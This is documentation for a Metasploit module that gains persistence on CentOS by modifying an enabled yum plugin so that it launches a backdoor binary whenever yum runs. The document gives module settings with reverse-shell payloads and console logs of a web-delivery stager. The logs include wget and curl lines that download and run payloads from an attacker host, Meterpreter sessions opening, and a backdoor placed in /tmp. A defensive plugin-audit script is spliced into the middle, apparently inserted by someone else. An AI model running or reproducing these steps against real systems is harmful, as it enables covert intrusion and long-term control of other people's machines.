documentation/modules/exploit/linux/persistence/yum_package_manager.md
## Vulnerable Application

This module runs a payload whenever the package manager is used: it modifies an existing yum plugin so that the plugin launches a binary of your choice.

To list the plugins currently enabled on the system (`grep` needs `-r` to search the directory):

```
grep -rF 'enabled=1' /etc/yum/pluginconf.d/
```

Root permissions are likely required.

Verified on CentOS 7.1.
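Because the module works by editing an enabled plugin in place, the defensive check is to enumerate enabled plugins from `pluginconf.d` and scan their sources for process-spawning calls. The following script is an added example, not part of the module or this documentation; the `SUSPICIOUS` pattern is a heuristic of my own, and the directory contents are constructed in a temporary directory so it runs offline (point `audit()` at `/etc/yum/pluginconf.d` and `/usr/lib/yum-plugins` for a real host).

```python
import os
import re
import tempfile
from configparser import ConfigParser
from pathlib import Path

# Calls a stock yum plugin has no business making; a plugin edited to launch a dropped binary needs one (heuristic).
SUSPICIOUS = re.compile(r"subprocess\.|os\.system\(|os\.popen\(|os\.exec|/tmp/")

def enabled_plugins(conf_dir):
    """Names of plugins whose <name>.conf sets enabled=1 under [main]."""
    names = []
    for fn in sorted(os.listdir(conf_dir)):
        if not fn.endswith(".conf"):
            continue
        cp = ConfigParser()
        cp.read(os.path.join(conf_dir, fn))
        if cp.has_option("main", "enabled") and cp.get("main", "enabled").strip() == "1":
            names.append(fn[:-len(".conf")])
    return names

def audit(conf_dir, plugin_dir):
    """Map each enabled plugin to the lines of its source that match SUSPICIOUS."""
    findings = {}
    for name in enabled_plugins(conf_dir):
        path = os.path.join(plugin_dir, name + ".py")
        if not os.path.isfile(path):
            continue  # enabled but no source file: yum will warn; also worth a look
        with open(path) as fh:
            hits = [ln.rstrip() for ln in fh if SUSPICIOUS.search(ln)]
        if hits:
            findings[name] = hits
    return findings

def build_sample():
    """Constructed stand-in for /etc/yum/pluginconf.d and /usr/lib/yum-plugins."""
    root = tempfile.mkdtemp()
    conf, plug = os.path.join(root, "pluginconf.d"), os.path.join(root, "yum-plugins")
    files = {
        (conf, "fastestmirror.conf"): "[main]\nenabled=1\n",
        (conf, "langpacks.conf"): "[main]\nenabled = 1\n",
        (conf, "product-id.conf"): "[main]\nenabled=0\n",
        (plug, "fastestmirror.py"): "from yum.plugins import TYPE_CORE\nrequires_api_version = '2.5'\n",
        # constructed sample of a tampered plugin: its init hook spawns a file dropped in /tmp
        (plug, "langpacks.py"): "import subprocess\ndef init_hook(conduit):\n    subprocess.Popen(['/tmp/CONSTRUCTED'])\n",
    }
    for (d, fn), body in files.items():
        Path(d).mkdir(exist_ok=True)
        Path(d, fn).write_text(body)
    return conf, plug
```

A clean enabled plugin produces no finding; the disabled one is skipped because yum never loads it, matching what the `grep` above reports.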
## Verification Steps

1. `use exploit/linux/persistence/yum_package_manager`
2. `set SESSION <id>`
3. `set PAYLOAD cmd/unix/reverse_python`
4. Configure the payload as needed
5. `exploit`

When the system runs `yum update` the payload will launch. You must set up a handler accordingly.
## Options

- Name of the backdoor executable
- Name of the yum plugin to target
- Plugin path to use (default: `/usr/lib/yum-plugins/`)
## Scenarios

### Initial access vector via web delivery

```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set srvport 8181
srvport => 8181
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4545
lport => 4545
resource (/root/.msf4/msfconsole.rc)> set URIPATH l
URIPATH => l
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 111.111.1.111:4545
[*] Using URL: http://111.111.1.111:8181/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO KOiqZchh --no-check-certificate http://111.111.1.111:8181/l; chmod +x KOiqZchh; ./KOiqZchh& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.2.100
[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 192.168.2.100:34470) at 2025-02-16 11:30:09 -0500
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/yum_package_manager
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:2 Agents:2) exploit(linux/persistence/yum_package_manager) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/home/centos) > getuid
Server username: root
(Meterpreter 1)(/home/centos) > sysinfo
Computer : centos71.localdomain
OS : CentOS 7.9.2009 (Linux 3.10.0-1160.53.1.el7.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
(Meterpreter 1)(/home/centos) > background
[*] Backgrounding session 1...
```
### Persistence

```
[msf](Jobs:1 Agents:1) exploit(linux/persistence/yum_package_manager) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(linux/persistence/yum_package_manager) > exploit
[*] Command to run on remote host: curl -so ./lgtOaZox http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./lgtOaZox;./lgtOaZox&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(linux/persistence/yum_package_manager) >
[*] Fetch handler listening on 111.111.1.111:8080
[*] HTTP server started
[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
[*] Started reverse TCP handler on 111.111.1.111:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.222
[+] Plugins are enabled!
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:53880) at 2025-02-16 11:30:59 -0500
[!] The service is running, but could not be validated. yum installed and plugin found, enabled, and backdoorable
[*] Attempting to modify plugin
[*] Backdoor uploaded to /tmp/7EtplboZD
[+] Backdoor will run on next Yum update
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/centos71.localdomain_20250216.3101/centos71.localdomain_20250216.3101.rc
```